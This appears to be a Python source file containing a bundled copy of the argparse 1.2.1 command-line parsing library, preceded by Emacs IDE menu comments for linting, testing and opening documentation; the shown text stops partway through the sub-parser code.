# . (shell-command-on-region (region-beginning) (region-end) "sed 's,^ ,,;/^[ ]*##/d;/^[ ]*#/{;s,^ *# *,,p;d;};/^[ ]*$/!s,^,>>> ,'" nil nil nil t)
# :ide: +-#+
# . Doctest ()
# :ide: LINT: Check 80 column width ignoring IDE Menus
# . (let ((args " | /srv/ftp/pub/check-80-col.sh -")) (compile (concat "sed 's,^\\(\\|. \\|.. \\|... \\)\\(:ide\\|[.] \\).*,,;s,^ *. (progn (forward-line.*,,' " (buffer-file-name) " " args " | sed 's,^-," (buffer-file-name) ",'")))
# :ide: LINT: Check 80 column width
# . (let ((args "")) (compile (concat "/srv/ftp/pub/check-80-col.sh " (buffer-file-name) " " args)))
# :ide: +-#+
# . Lint Tools ()
# :ide: DELIM: @: SYM :@ @:fillme:@ adhoc tag
# . (symbol-tag-normalize-delimiter (cons (cons nil "@:") (cons ":@" nil)) t)
# :ide: +-#+
# . Delimiters ()
# :ide: COMPILE: Run with --ap-help
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --ap-help")))
# :ide: COMPILE: Run with --help
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --help")))
# :ide: COMPILE: Run with --test
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --test")))
# :ide: COMPILE: Run with --test --verbose
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --test --verbose")))
# :ide: COMPILE: Run with --debug
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --debug")))
# :ide: +-#+
# . Compile with standard arguments ()
# :ide: OCCUR-OUTLINE: Python Source Code
# . (x-symbol-tag-occur-outline "sec" '("|||:" ":|||") (cons (cons "^\\([ \t\r]*\\(def\\|class\\)[ ]+\\|[A-Za-z_]?\\)" nil) (cons nil "\\([ \t\r]*(\\|[ \t]*=\\)")))
# :ide: MENU-OUTLINE: Python Source Code
# . (x-eIDE-menu-outline "sec" '("|||:" ":|||") (cons (cons "^\\([ \t\r]*\\(def\\|class\\)[ ]+\\|[A-Za-z_]?\\)" nil) (cons nil "\\([ \t\r]*(\\|[ \t]*=\\)")))
# :ide: +-#+
# . Outline ()
# :ide: INFO: SQLAlchemy - SQL Expression Language - Reference
# . (let ((ref-buffer "*sqa-expr-ref*")) (if (not (get-buffer ref-buffer)) (shell-command (concat "w3m -dump -cols " (number-to-string (1- (window-width))) " 'http://www.sqlalchemy.org/docs/05/reference/sqlalchemy/expressions.html'") ref-buffer) (display-buffer ref-buffer t)))
# :ide: INFO: SQLAlchemy - SQL Expression Language - Tutorial
# . (let ((ref-buffer "*sqa-expr-tutor*")) (if (not (get-buffer ref-buffer)) (shell-command (concat "w3m -dump -cols " (number-to-string (1- (window-width))) " 'http://www.sqlalchemy.org/docs/05/sqlexpression.html'") ref-buffer) (display-buffer ref-buffer t)))
# :ide: INFO: SQLAlchemy - Query
# . (let ((ref-buffer "*sqa-query*")) (if (not (get-buffer ref-buffer)) (shell-command (concat "w3m -dump -cols " (number-to-string (1- (window-width))) " 'http://www.sqlalchemy.org/docs/orm/query.html'") ref-buffer) (display-buffer ref-buffer t)))
# :ide: +-#+
# . SQLAlchemy Reference ()
# :ide: INFO: Python - argparse
# . (let ((ref-buffer "*python-argparse*")) (if (not (get-buffer ref-buffer)) (shell-command (concat "w3m -dump -cols " (number-to-string (1- (window-width))) " 'http://docs.python.org/library/argparse.html'") ref-buffer) (display-buffer ref-buffer t)))
# :ide: INFO: Python Documentation
# . (let ((ref-buffer "*w3m*")) (if (get-buffer ref-buffer) (display-buffer ref-buffer t)) (other-window 1) (w3m-goto-url "http://docs.python.org/index.html" nil nil))
# :ide: INFO: Python Reference
# . (let* ((ref-buffer "*python-ref*") (local "/home/ws/project/ws-util/python/reference/PQR2.7.html") (url (or (and (file-exists-p local) local) "'http://rgruet.free.fr/PQR27/PQR2.7.html'"))) (unless (get-buffer ref-buffer) (get-buffer-create ref-buffer) (with-current-buffer ref-buffer (shell-command (concat "snc txt.py.reference 2>/dev/null") ref-buffer) (goto-char (point-min)) (if (eobp) (shell-command (concat "w3m -dump -cols " (number-to-string (1- (window-width))) " " url) ref-buffer)))) (display-buffer ref-buffer t))
# :ide: +-#+
# . Python Reference ()
# @:adhoc_disable:@
# :ide: COMPILE: Run with --verbose --implode >namespace_dict_imploded.py
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --verbose --implode >namespace_dict_imploded.py")))
# @:adhoc_disable:@
# :ide: COMPILE: Run with --template list
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --template list")))
# :ide: COMPILE: Run with --template
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --template")))
# :ide: COMPILE: Run with python3 --test
# . (progn (save-buffer) (compile (concat "python3 ./" (file-name-nondirectory (buffer-file-name)) " --test")))
# :ide: COMPILE: Run with python3 w/o args
# . (progn (save-buffer) (compile (concat "python3 ./" (file-name-nondirectory (buffer-file-name)) " ")))
# :ide: COMPILE: Run with --test
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --test")))
# :ide: COMPILE: Run w/o args
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " ")))
# :ide: +-#+
# . Compile ()
#
# Local Variables:
# mode: python
# comment-start: "#"
# comment-start-skip: "#+"
# comment-column: 0
# truncate-lines: t
# End:
# Bundled copy of the `argparse` library, version 1.2.1 (the standalone
# backport distribution).  The names below are the module's public API.
__version__ = '1.2.1'
__all__ = [
    'ArgumentParser',
    'ArgumentError',
    'ArgumentTypeError',
    'FileType',
    'HelpFormatter',
    'ArgumentDefaultsHelpFormatter',
    'RawDescriptionHelpFormatter',
    'RawTextHelpFormatter',
    'Namespace',
    'Action',
    'ONE_OR_MORE',
    'OPTIONAL',
    'PARSER',
    'REMAINDER',
    'SUPPRESS',
    'ZERO_OR_MORE',
]
import copy as _copy
import os as _os
import re as _re
import sys as _sys
import textwrap as _textwrap
from gettext import gettext as _
# Compatibility shims: provide `set`, `basestring` and `sorted` on
# interpreters that lack them.  On any modern Python the `try` bodies
# succeed and the fallbacks are never defined.
try:
    set
except NameError:
    # for python < 2.4 compatibility (sets module is there since 2.3):
    from sets import Set as set
try:
    basestring
except NameError:
    # Python 3: basestring is gone; plain str is the string base type.
    basestring = str
try:
    sorted
except NameError:
    # for python < 2.4 compatibility:
    # NOTE: unlike the builtin, this fallback takes no `key`/`cmp`
    # arguments; the module only uses plain and reverse sorting.
    def sorted(iterable, reverse=False):
        result = list(iterable)
        result.sort()
        if reverse:
            result.reverse()
        return result
def _callable(obj):
    """Portable callable() test: true for objects with __call__ and for classes."""
    for marker in ('__call__', '__bases__'):
        if hasattr(obj, marker):
            return True
    return False
# Sentinel telling the formatter/parser to omit an item entirely.
SUPPRESS = '==SUPPRESS=='
# nargs markers: zero-or-one, zero-or-more, one-or-more arguments.
OPTIONAL = '?'
ZERO_OR_MORE = '*'
ONE_OR_MORE = '+'
# nargs marker for sub-parser dispatch (first arg selects the parser).
PARSER = 'A...'
# nargs marker that captures all remaining argv entries verbatim.
REMAINDER = '...'
# Namespace attribute used to accumulate unrecognized argument strings.
_UNRECOGNIZED_ARGS_ATTR = '_unrecognized_args'
# =============================
# Utility functions and classes
# =============================
class _AttributeHolder(object):
    """Abstract base class that provides __repr__.

    The __repr__ method returns a string in the format::
        ClassName(attr=name, attr=name, ...)

    The attributes are determined either by a class-level attribute,
    '_kwarg_names', or by inspecting the instance __dict__.
    """

    def __repr__(self):
        pieces = [repr(arg) for arg in self._get_args()]
        pieces.extend('%s=%r' % (name, value)
                      for name, value in self._get_kwargs())
        return '%s(%s)' % (type(self).__name__, ', '.join(pieces))

    def _get_kwargs(self):
        # Default: every instance attribute, in sorted name order.
        return sorted(self.__dict__.items())

    def _get_args(self):
        # Positional parts of the repr; subclasses may override.
        return []
def _ensure_value(namespace, name, value):
    """Return namespace.<name>, first setting it to *value* when missing or None."""
    is_unset = getattr(namespace, name, None) is None
    if is_unset:
        setattr(namespace, name, value)
    return getattr(namespace, name)
# ===============
# Formatting Help
# ===============
class HelpFormatter(object):
    """Formatter for generating usage messages and argument help strings.

    Only the name of this class is considered a public API. All the methods
    provided by the class are considered an implementation detail.
    """

    def __init__(self,
                 prog,
                 indent_increment=2,
                 max_help_position=24,
                 width=None):

        # default setting for width: $COLUMNS if set and numeric, else 80,
        # minus a 2-column safety margin
        if width is None:
            try:
                width = int(_os.environ['COLUMNS'])
            except (KeyError, ValueError):
                width = 80
            width -= 2

        self._prog = prog
        self._indent_increment = indent_increment
        self._max_help_position = max_help_position
        self._width = width

        self._current_indent = 0
        self._level = 0
        # widest invocation string seen so far; aligns the help column
        self._action_max_length = 0

        self._root_section = self._Section(self, None)
        self._current_section = self._root_section

        self._whitespace_matcher = _re.compile(r'\s+')
        self._long_break_matcher = _re.compile(r'\n\n\n+')

    # ===============================
    # Section and indentation methods
    # ===============================
    def _indent(self):
        self._current_indent += self._indent_increment
        self._level += 1

    def _dedent(self):
        self._current_indent -= self._indent_increment
        assert self._current_indent >= 0, 'Indent decreased below 0.'
        self._level -= 1

    class _Section(object):
        # One (possibly nested) help section: a heading plus a list of
        # deferred (callable, args) formatting items.

        def __init__(self, formatter, parent, heading=None):
            self.formatter = formatter
            self.parent = parent
            self.heading = heading
            self.items = []

        def format_help(self):
            # format the indented section
            if self.parent is not None:
                self.formatter._indent()
            join = self.formatter._join_parts
            # Format each queued item exactly once.  (A previous revision
            # also ran a discarded `for func, args in self.items` pass
            # beforehand, invoking every formatter twice for no benefit.)
            item_help = join([func(*args) for func, args in self.items])
            if self.parent is not None:
                self.formatter._dedent()

            # return nothing if the section was empty
            if not item_help:
                return ''

            # add the heading if the section was non-empty
            if self.heading is not SUPPRESS and self.heading is not None:
                current_indent = self.formatter._current_indent
                heading = '%*s%s:\n' % (current_indent, '', self.heading)
            else:
                heading = ''

            # join the section-initial newline, the heading and the help
            return join(['\n', heading, item_help, '\n'])

    def _add_item(self, func, args):
        self._current_section.items.append((func, args))

    # ========================
    # Message building methods
    # ========================
    def start_section(self, heading):
        self._indent()
        section = self._Section(self, self._current_section, heading)
        self._add_item(section.format_help, [])
        self._current_section = section

    def end_section(self):
        self._current_section = self._current_section.parent
        self._dedent()

    def add_text(self, text):
        if text is not SUPPRESS and text is not None:
            self._add_item(self._format_text, [text])

    def add_usage(self, usage, actions, groups, prefix=None):
        if usage is not SUPPRESS:
            args = usage, actions, groups, prefix
            self._add_item(self._format_usage, args)

    def add_argument(self, action):
        if action.help is not SUPPRESS:

            # find all invocations
            get_invocation = self._format_action_invocation
            invocations = [get_invocation(action)]
            for subaction in self._iter_indented_subactions(action):
                invocations.append(get_invocation(subaction))

            # update the maximum item length
            invocation_length = max([len(s) for s in invocations])
            action_length = invocation_length + self._current_indent
            self._action_max_length = max(self._action_max_length,
                                          action_length)

            # add the item to the list
            self._add_item(self._format_action, [action])

    def add_arguments(self, actions):
        for action in actions:
            self.add_argument(action)

    # =======================
    # Help-formatting methods
    # =======================
    def format_help(self):
        help = self._root_section.format_help()
        if help:
            # collapse runs of blank lines and normalize the trailing newline
            help = self._long_break_matcher.sub('\n\n', help)
            help = help.strip('\n') + '\n'
        return help

    def _join_parts(self, part_strings):
        return ''.join([part
                        for part in part_strings
                        if part and part is not SUPPRESS])

    def _format_usage(self, usage, actions, groups, prefix):
        if prefix is None:
            prefix = _('usage: ')

        # if usage is specified, use that
        if usage is not None:
            usage = usage % dict(prog=self._prog)

        # if no optionals or positionals are available, usage is just prog
        elif usage is None and not actions:
            usage = '%(prog)s' % dict(prog=self._prog)

        # if optionals and positionals are available, calculate usage
        elif usage is None:
            prog = '%(prog)s' % dict(prog=self._prog)

            # split optionals from positionals
            optionals = []
            positionals = []
            for action in actions:
                if action.option_strings:
                    optionals.append(action)
                else:
                    positionals.append(action)

            # build full usage string
            format = self._format_actions_usage
            action_usage = format(optionals + positionals, groups)
            usage = ' '.join([s for s in [prog, action_usage] if s])

            # wrap the usage parts if it's too long
            text_width = self._width - self._current_indent
            if len(prefix) + len(usage) > text_width:

                # break usage into wrappable parts
                part_regexp = r'\(.*?\)+|\[.*?\]+|\S+'
                opt_usage = format(optionals, groups)
                pos_usage = format(positionals, groups)
                opt_parts = _re.findall(part_regexp, opt_usage)
                pos_parts = _re.findall(part_regexp, pos_usage)
                assert ' '.join(opt_parts) == opt_usage
                assert ' '.join(pos_parts) == pos_usage

                # helper for wrapping lines
                def get_lines(parts, indent, prefix=None):
                    lines = []
                    line = []
                    if prefix is not None:
                        line_len = len(prefix) - 1
                    else:
                        line_len = len(indent) - 1
                    for part in parts:
                        if line_len + 1 + len(part) > text_width:
                            lines.append(indent + ' '.join(line))
                            line = []
                            line_len = len(indent) - 1
                        line.append(part)
                        line_len += len(part) + 1
                    if line:
                        lines.append(indent + ' '.join(line))
                    if prefix is not None:
                        lines[0] = lines[0][len(indent):]
                    return lines

                # if prog is short, follow it with optionals or positionals
                if len(prefix) + len(prog) <= 0.75 * text_width:
                    indent = ' ' * (len(prefix) + len(prog) + 1)
                    if opt_parts:
                        lines = get_lines([prog] + opt_parts, indent, prefix)
                        lines.extend(get_lines(pos_parts, indent))
                    elif pos_parts:
                        lines = get_lines([prog] + pos_parts, indent, prefix)
                    else:
                        lines = [prog]

                # if prog is long, put it on its own line
                else:
                    indent = ' ' * len(prefix)
                    parts = opt_parts + pos_parts
                    lines = get_lines(parts, indent)
                    if len(lines) > 1:
                        lines = []
                        lines.extend(get_lines(opt_parts, indent))
                        lines.extend(get_lines(pos_parts, indent))
                    lines = [prog] + lines

                # join lines into usage
                usage = '\n'.join(lines)

        # prefix with 'usage:'
        return '%s%s\n\n' % (prefix, usage)

    def _format_actions_usage(self, actions, groups):
        # find group indices and identify actions in groups
        group_actions = set()
        inserts = {}
        for group in groups:
            try:
                start = actions.index(group._group_actions[0])
            except ValueError:
                continue
            else:
                end = start + len(group._group_actions)
                if actions[start:end] == group._group_actions:
                    for action in group._group_actions:
                        group_actions.add(action)
                    if not group.required:
                        if start in inserts:
                            inserts[start] += ' ['
                        else:
                            inserts[start] = '['
                        inserts[end] = ']'
                    else:
                        if start in inserts:
                            inserts[start] += ' ('
                        else:
                            inserts[start] = '('
                        inserts[end] = ')'
                    for i in range(start + 1, end):
                        inserts[i] = '|'

        # collect all actions format strings
        parts = []
        for i, action in enumerate(actions):

            # suppressed arguments are marked with None
            # remove | separators for suppressed arguments
            if action.help is SUPPRESS:
                parts.append(None)
                if inserts.get(i) == '|':
                    inserts.pop(i)
                elif inserts.get(i + 1) == '|':
                    inserts.pop(i + 1)

            # produce all arg strings
            elif not action.option_strings:
                part = self._format_args(action, action.dest)

                # if it's in a group, strip the outer []
                if action in group_actions:
                    if part[0] == '[' and part[-1] == ']':
                        part = part[1:-1]

                # add the action string to the list
                parts.append(part)

            # produce the first way to invoke the option in brackets
            else:
                option_string = action.option_strings[0]

                # if the Optional doesn't take a value, format is:
                #    -s or --long
                if action.nargs == 0:
                    part = '%s' % option_string

                # if the Optional takes a value, format is:
                #    -s ARGS or --long ARGS
                else:
                    default = action.dest.upper()
                    args_string = self._format_args(action, default)
                    part = '%s %s' % (option_string, args_string)

                # make it look optional if it's not required or in a group
                if not action.required and action not in group_actions:
                    part = '[%s]' % part

                # add the action string to the list
                parts.append(part)

        # insert things at the necessary indices
        for i in sorted(inserts, reverse=True):
            parts[i:i] = [inserts[i]]

        # join all the action items with spaces
        text = ' '.join([item for item in parts if item is not None])

        # clean up separators for mutually exclusive groups
        open = r'[\[(]'
        close = r'[\])]'
        text = _re.sub(r'(%s) ' % open, r'\1', text)
        text = _re.sub(r' (%s)' % close, r'\1', text)
        text = _re.sub(r'%s *%s' % (open, close), r'', text)
        text = _re.sub(r'\(([^|]*)\)', r'\1', text)
        text = text.strip()

        # return the text
        return text

    def _format_text(self, text):
        if '%(prog)' in text:
            text = text % dict(prog=self._prog)
        text_width = self._width - self._current_indent
        indent = ' ' * self._current_indent
        return self._fill_text(text, text_width, indent) + '\n\n'

    def _format_action(self, action):
        # determine the required width and the entry label
        help_position = min(self._action_max_length + 2,
                            self._max_help_position)
        help_width = self._width - help_position
        action_width = help_position - self._current_indent - 2
        action_header = self._format_action_invocation(action)

        # no help; start on same line and add a final newline
        if not action.help:
            tup = self._current_indent, '', action_header
            action_header = '%*s%s\n' % tup

        # short action name; start on the same line and pad two spaces
        elif len(action_header) <= action_width:
            tup = self._current_indent, '', action_width, action_header
            action_header = '%*s%-*s  ' % tup
            indent_first = 0

        # long action name; start on the next line
        else:
            tup = self._current_indent, '', action_header
            action_header = '%*s%s\n' % tup
            indent_first = help_position

        # collect the pieces of the action help
        parts = [action_header]

        # if there was help for the action, add lines of help text
        if action.help:
            help_text = self._expand_help(action)
            help_lines = self._split_lines(help_text, help_width)
            parts.append('%*s%s\n' % (indent_first, '', help_lines[0]))
            for line in help_lines[1:]:
                parts.append('%*s%s\n' % (help_position, '', line))

        # or add a newline if the description doesn't end with one
        elif not action_header.endswith('\n'):
            parts.append('\n')

        # if there are any sub-actions, add their help as well
        for subaction in self._iter_indented_subactions(action):
            parts.append(self._format_action(subaction))

        # return a single string
        return self._join_parts(parts)

    def _format_action_invocation(self, action):
        if not action.option_strings:
            metavar, = self._metavar_formatter(action, action.dest)(1)
            return metavar

        else:
            parts = []

            # if the Optional doesn't take a value, format is:
            #    -s, --long
            if action.nargs == 0:
                parts.extend(action.option_strings)

            # if the Optional takes a value, format is:
            #    -s ARGS, --long ARGS
            else:
                default = action.dest.upper()
                args_string = self._format_args(action, default)
                for option_string in action.option_strings:
                    parts.append('%s %s' % (option_string, args_string))

            return ', '.join(parts)

    def _metavar_formatter(self, action, default_metavar):
        if action.metavar is not None:
            result = action.metavar
        elif action.choices is not None:
            choice_strs = [str(choice) for choice in action.choices]
            result = '{%s}' % ','.join(choice_strs)
        else:
            result = default_metavar

        # returns a callable producing a tuple of `tuple_size` metavars
        def format(tuple_size):
            if isinstance(result, tuple):
                return result
            else:
                return (result, ) * tuple_size
        return format

    def _format_args(self, action, default_metavar):
        get_metavar = self._metavar_formatter(action, default_metavar)
        if action.nargs is None:
            result = '%s' % get_metavar(1)
        elif action.nargs == OPTIONAL:
            result = '[%s]' % get_metavar(1)
        elif action.nargs == ZERO_OR_MORE:
            result = '[%s [%s ...]]' % get_metavar(2)
        elif action.nargs == ONE_OR_MORE:
            result = '%s [%s ...]' % get_metavar(2)
        elif action.nargs == REMAINDER:
            result = '...'
        elif action.nargs == PARSER:
            result = '%s ...' % get_metavar(1)
        else:
            formats = ['%s' for _ in range(action.nargs)]
            result = ' '.join(formats) % get_metavar(action.nargs)
        return result

    def _expand_help(self, action):
        # %-expand the help string with the action's own attributes
        params = dict(vars(action), prog=self._prog)
        for name in list(params):
            if params[name] is SUPPRESS:
                del params[name]
        for name in list(params):
            if hasattr(params[name], '__name__'):
                params[name] = params[name].__name__
        if params.get('choices') is not None:
            choices_str = ', '.join([str(c) for c in params['choices']])
            params['choices'] = choices_str
        return self._get_help_string(action) % params

    def _iter_indented_subactions(self, action):
        # yield sub-actions (if any) with the indent level bumped
        try:
            get_subactions = action._get_subactions
        except AttributeError:
            pass
        else:
            self._indent()
            for subaction in get_subactions():
                yield subaction
            self._dedent()

    def _split_lines(self, text, width):
        text = self._whitespace_matcher.sub(' ', text).strip()
        return _textwrap.wrap(text, width)

    def _fill_text(self, text, width, indent):
        text = self._whitespace_matcher.sub(' ', text).strip()
        return _textwrap.fill(text, width, initial_indent=indent,
                                           subsequent_indent=indent)

    def _get_help_string(self, action):
        return action.help
class RawDescriptionHelpFormatter(HelpFormatter):
    """Help message formatter which retains any formatting in descriptions.

    Only the name of this class is considered a public API. All the methods
    provided by the class are considered an implementation detail.
    """

    def _fill_text(self, text, width, indent):
        # Keep the author's own line breaks; only prepend the indent
        # (the base class would re-wrap the text to `width`).
        return ''.join([indent + line for line in text.splitlines(True)])
class RawTextHelpFormatter(RawDescriptionHelpFormatter):
    """Help message formatter which retains formatting of all help text.

    Only the name of this class is considered a public API. All the methods
    provided by the class are considered an implementation detail.
    """

    def _split_lines(self, text, width):
        # Preserve explicit newlines in help strings instead of re-wrapping.
        return text.splitlines()
class ArgumentDefaultsHelpFormatter(HelpFormatter):
    """Help message formatter which adds default values to argument help.

    Only the name of this class is considered a public API. All the methods
    provided by the class are considered an implementation detail.
    """

    def _get_help_string(self, action):
        # Append a "(default: ...)" hint unless the help text already
        # mentions the default, the default is suppressed, or the action
        # is a positional whose nargs never falls back to the default.
        help = action.help
        if '%(default)' in action.help:
            return help
        if action.default is SUPPRESS:
            return help
        if action.option_strings or action.nargs in (OPTIONAL, ZERO_OR_MORE):
            help += ' (default: %(default)s)'
        return help
# =====================
# Options and Arguments
# =====================
def _get_action_name(argument):
    """Best human-readable name for *argument*: options, metavar, or dest."""
    if argument is None:
        return None
    if argument.option_strings:
        return '/'.join(argument.option_strings)
    for candidate in (argument.metavar, argument.dest):
        if candidate not in (None, SUPPRESS):
            return candidate
    return None
class ArgumentError(Exception):
    """An error from creating or using an argument (optional or positional).

    The string value of this exception is the message, augmented with
    information about the argument that caused it.
    """

    def __init__(self, argument, message):
        self.argument_name = _get_action_name(argument)
        self.message = message

    def __str__(self):
        fields = dict(message=self.message,
                      argument_name=self.argument_name)
        if self.argument_name is None:
            return '%(message)s' % fields
        return 'argument %(argument_name)s: %(message)s' % fields
class ArgumentTypeError(Exception):
    """An error from trying to convert a command line string to a type."""
    pass
# ==============
# Action classes
# ==============
class Action(_AttributeHolder):
    """Information about how to convert command line strings to Python objects.

    Action objects are used by an ArgumentParser to represent the information
    needed to parse a single argument from one or more strings from the
    command line. The keyword arguments to the Action constructor are also
    all attributes of Action instances.

    Keyword Arguments:

        - option_strings -- A list of command-line option strings which
            should be associated with this action.

        - dest -- The name of the attribute to hold the created object(s)

        - nargs -- The number of command-line arguments that should be
            consumed. By default, one argument will be consumed and a single
            value will be produced.  Other values include:
                - N (an integer) consumes N arguments (and produces a list)
                - '?' consumes zero or one arguments
                - '*' consumes zero or more arguments (and produces a list)
                - '+' consumes one or more arguments (and produces a list)
            Note that the difference between the default and nargs=1 is that
            with the default, a single value will be produced, while with
            nargs=1, a list containing a single value will be produced.

        - const -- The value to be produced if the option is specified and the
            option uses an action that takes no values.

        - default -- The value to be produced if the option is not specified.

        - type -- The type which the command-line arguments should be converted
            to, should be one of 'string', 'int', 'float', 'complex' or a
            callable object that accepts a single string argument. If None,
            'string' is assumed.

        - choices -- A container of values that should be allowed. If not None,
            after a command-line argument has been converted to the appropriate
            type, an exception will be raised if it is not a member of this
            collection.

        - required -- True if the action must always be specified at the
            command line. This is only meaningful for optional command-line
            arguments.

        - help -- The help string describing the argument.

        - metavar -- The name to be used for the option's argument with the
            help string. If None, the 'dest' value will be used as the name.
    """

    def __init__(self,
                 option_strings,
                 dest,
                 nargs=None,
                 const=None,
                 default=None,
                 type=None,
                 choices=None,
                 required=False,
                 help=None,
                 metavar=None):
        self.option_strings = option_strings
        self.dest = dest
        self.nargs = nargs
        self.const = const
        self.default = default
        self.type = type
        self.choices = choices
        self.required = required
        self.help = help
        self.metavar = metavar

    # Attributes rendered by _AttributeHolder.__repr__
    # (note: 'required' is deliberately absent from this list).
    def _get_kwargs(self):
        names = [
            'option_strings',
            'dest',
            'nargs',
            'const',
            'default',
            'type',
            'choices',
            'help',
            'metavar',
        ]
        return [(name, getattr(self, name)) for name in names]

    # Subclasses must override; the parser invokes this with the
    # already-converted values when the argument is encountered.
    def __call__(self, parser, namespace, values, option_string=None):
        raise NotImplementedError(_('.__call__() not defined'))
class _StoreAction(Action):
    """Action that stores its (converted) argument value on the namespace."""

    def __init__(self,
                 option_strings,
                 dest,
                 nargs=None,
                 const=None,
                 default=None,
                 type=None,
                 choices=None,
                 required=False,
                 help=None,
                 metavar=None):
        # nargs=0 would store nothing useful; steer users toward the
        # store_true / store_const family instead.
        if nargs == 0:
            raise ValueError('nargs for store actions must be > 0; if you '
                             'have nothing to store, actions such as store '
                             'true or store const may be more appropriate')
        # const is only ever consumed when nargs is '?'.
        if const is not None and nargs != OPTIONAL:
            raise ValueError('nargs must be %r to supply const' % OPTIONAL)
        super(_StoreAction, self).__init__(
            option_strings=option_strings,
            dest=dest,
            nargs=nargs,
            const=const,
            default=default,
            type=type,
            choices=choices,
            required=required,
            help=help,
            metavar=metavar)

    def __call__(self, parser, namespace, values, option_string=None):
        # Overwrite any previously stored value for this destination.
        setattr(namespace, self.dest, values)
class _StoreConstAction(Action):
    """Action that stores a fixed constant when its option is encountered."""

    def __init__(self,
                 option_strings,
                 dest,
                 const,
                 default=None,
                 required=False,
                 help=None,
                 metavar=None):
        # metavar is accepted for signature compatibility but not forwarded:
        # with nargs=0 the option consumes no value to label.
        super(_StoreConstAction, self).__init__(
            option_strings=option_strings,
            dest=dest,
            nargs=0,
            const=const,
            default=default,
            required=required,
            help=help)

    def __call__(self, parser, namespace, values, option_string=None):
        setattr(namespace, self.dest, self.const)
class _StoreTrueAction(_StoreConstAction):
    """Store True when the option appears (default is False)."""

    def __init__(self,
                 option_strings,
                 dest,
                 default=False,
                 required=False,
                 help=None):
        super(_StoreTrueAction, self).__init__(
            option_strings=option_strings,
            dest=dest,
            const=True,
            default=default,
            required=required,
            help=help)
class _StoreFalseAction(_StoreConstAction):
    """Store False when the option appears (default is True)."""

    def __init__(self,
                 option_strings,
                 dest,
                 default=True,
                 required=False,
                 help=None):
        super(_StoreFalseAction, self).__init__(
            option_strings=option_strings,
            dest=dest,
            const=False,
            default=default,
            required=required,
            help=help)
class _AppendAction(Action):
    """Append each occurrence's value to a list stored on the namespace."""

    def __init__(self,
                 option_strings,
                 dest,
                 nargs=None,
                 const=None,
                 default=None,
                 type=None,
                 choices=None,
                 required=False,
                 help=None,
                 metavar=None):
        if nargs == 0:
            raise ValueError('nargs for append actions must be > 0; if arg '
                             'strings are not supplying the value to append, '
                             'the append const action may be more appropriate')
        # const is only ever consumed when nargs is '?'.
        if const is not None and nargs != OPTIONAL:
            raise ValueError('nargs must be %r to supply const' % OPTIONAL)
        super(_AppendAction, self).__init__(
            option_strings=option_strings,
            dest=dest,
            nargs=nargs,
            const=const,
            default=default,
            type=type,
            choices=choices,
            required=required,
            help=help,
            metavar=metavar)

    def __call__(self, parser, namespace, values, option_string=None):
        # Copy before appending so a shared default list is never mutated.
        items = _copy.copy(_ensure_value(namespace, self.dest, []))
        items.append(values)
        setattr(namespace, self.dest, items)
class _AppendConstAction(Action):
    """Append a fixed constant to a list each time the option appears."""

    def __init__(self,
                 option_strings,
                 dest,
                 const,
                 default=None,
                 required=False,
                 help=None,
                 metavar=None):
        super(_AppendConstAction, self).__init__(
            option_strings=option_strings,
            dest=dest,
            nargs=0,
            const=const,
            default=default,
            required=required,
            help=help,
            metavar=metavar)

    def __call__(self, parser, namespace, values, option_string=None):
        # Copy before appending so a shared default list is never mutated.
        items = _copy.copy(_ensure_value(namespace, self.dest, []))
        items.append(self.const)
        setattr(namespace, self.dest, items)
class _CountAction(Action):
    """Count the number of times the option occurs (e.g. -vvv)."""

    def __init__(self,
                 option_strings,
                 dest,
                 default=None,
                 required=False,
                 help=None):
        super(_CountAction, self).__init__(
            option_strings=option_strings,
            dest=dest,
            nargs=0,
            default=default,
            required=required,
            help=help)

    def __call__(self, parser, namespace, values, option_string=None):
        # Start from 0 when the attribute is unset or None, then increment.
        new_count = _ensure_value(namespace, self.dest, 0) + 1
        setattr(namespace, self.dest, new_count)
class _HelpAction(Action):
    """Print the parser's full help text and exit the program."""

    def __init__(self,
                 option_strings,
                 dest=SUPPRESS,
                 default=SUPPRESS,
                 help=None):
        super(_HelpAction, self).__init__(
            option_strings=option_strings,
            dest=dest,
            default=default,
            nargs=0,
            help=help)

    def __call__(self, parser, namespace, values, option_string=None):
        parser.print_help()
        parser.exit()
class _VersionAction(Action):
    """Format and print a version string, then exit via parser.exit()."""

    def __init__(self,
                 option_strings,
                 version=None,
                 dest=SUPPRESS,
                 default=SUPPRESS,
                 help="show program's version number and exit"):
        super(_VersionAction, self).__init__(
            option_strings=option_strings,
            dest=dest,
            default=default,
            nargs=0,
            help=help)
        self.version = version

    def __call__(self, parser, namespace, values, option_string=None):
        # Fall back to the parser-level version when none was given here.
        version = self.version
        if version is None:
            version = parser.version
        formatter = parser._get_formatter()
        formatter.add_text(version)
        parser.exit(message=formatter.format_help())
class _SubParsersAction(Action):
    """Action that dispatches the remaining arguments to a named sub-parser."""

    class _ChoicesPseudoAction(Action):
        # Lightweight stand-in carrying only a sub-command's name and help,
        # so the help formatter can render the list of choices.
        def __init__(self, name, help):
            sup = super(_SubParsersAction._ChoicesPseudoAction, self)
            sup.__init__(option_strings=[], dest=name, help=help)

    def __init__(self,
                 option_strings,
                 prog,
                 parser_class,
                 dest=SUPPRESS,
                 help=None,
                 metavar=None):
        self._prog_prefix = prog
        self._parser_class = parser_class
        # Maps sub-command name -> parser; doubles as the `choices` container.
        self._name_parser_map = {}
        self._choices_actions = []
        super(_SubParsersAction, self).__init__(
            option_strings=option_strings,
            dest=dest,
            nargs=PARSER,
            choices=self._name_parser_map,
            help=help,
            metavar=metavar)

    def add_parser(self, name, **kwargs):
        """Create, register and return a new sub-parser for *name*."""
        # set prog from the existing prefix
        if kwargs.get('prog') is None:
            kwargs['prog'] = '%s %s' % (self._prog_prefix, name)

        # create a pseudo-action to hold the choice help
        if 'help' in kwargs:
            help = kwargs.pop('help')
            choice_action = self._ChoicesPseudoAction(name, help)
